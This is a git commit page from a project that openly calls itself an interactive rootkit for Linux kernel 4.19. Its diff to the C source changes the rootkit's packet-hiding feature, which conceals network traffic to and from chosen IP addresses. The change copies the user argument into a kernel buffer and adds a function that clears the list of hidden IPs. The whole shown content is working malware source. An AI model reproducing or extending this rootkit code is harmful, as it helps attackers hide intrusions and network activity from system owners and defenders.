Merge pull request #5 from deurzen/feat/packhide_tiz - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 9c71e0834c421989b843b060bc40e10c9a525aeb
parent e0956d17de9b6bd22dc959cd3b6d68fa995989ea
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 20 Dec 2020 20:50:26 +0100

Merge pull request #5 from deurzen/feat/packhide_tiz

Feat/packhide tiz
Diffstat:
M src/channel.c  | 14 +++++++-------
M src/packhide.c  | 7 +++++++
M src/packhide.h  | 2 ++

3 files changed, 16 insertions(+), 7 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -245,24 +245,24 @@ handle_packhide(unsigned long arg)
     const char *sarg = (const char *)arg;
 
     if (!sarg) {
-        unhide_packets();
         rootkit.hiding_packets = 0;
+        clear_hidden_ips();
         DEBUG_NOTICE("[g7] packet hiding off\n");
     } else if (!copy_from_user(buf, sarg, BUFLEN)
         && (strstr(buf, ":") || strstr(buf, ".")))
     {
-        if (sarg[0] == (char)1) {
+        if (buf[0] == (char)1) {
             if (!rootkit.hiding_packets) {
                 hide_packets();
                 DEBUG_NOTICE("[g7] packet hiding on\n");
             }
 
-            hide_ip(&sarg[1]);
+            hide_ip(&buf[1]);
             rootkit.hiding_packets = 1;
-            DEBUG_INFO("[g7] hiding packets from/to ip address %s\n", &sarg[1]);
-        } else if (sarg[0] == (char)-1) {
-            unhide_ip(&sarg[1]);
-            DEBUG_INFO("[g7] unhiding packets from/to ip address %s\n", &sarg[1]);
+            DEBUG_INFO("[g7] hiding packets from/to ip address %s\n", &buf[1]);
+        } else if (buf[0] == (char)-1) {
+            unhide_ip(&buf[1]);
+            DEBUG_INFO("[g7] unhiding packets from/to ip address %s\n", &buf[1]);
         } else
             return -ENOTTY;
 
diff --git a/src/packhide.c b/src/packhide.c
@@ -154,6 +154,13 @@ g7_fault(struct kprobe *kp, struct pt_regs *pt_regs, int trapnr)
     return 0;
 }
 
+void
+clear_hidden_ips(void)
+{
+    ip_list_t_ptr i = hidden_ips_tail;
+    while ((i = remove_ip_from_list(i, i->ip, i->version)));
+}
+
 bool
 list_contains_ip(ip_list_t_ptr list, ip_t ip, ip_version version)
 {
diff --git a/src/packhide.h b/src/packhide.h
@@ -18,6 +18,8 @@ typedef struct ip_list {
 
 extern ip_list_t hidden_ips;
 
+void clear_hidden_ips(void);
+
 void hide_packets(void);
 void unhide_packets(void);

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs

M	src/channel.c	\|	14	+++++++-------
M	src/packhide.c	\|	7	+++++++
M	src/packhide.h	\|	2	++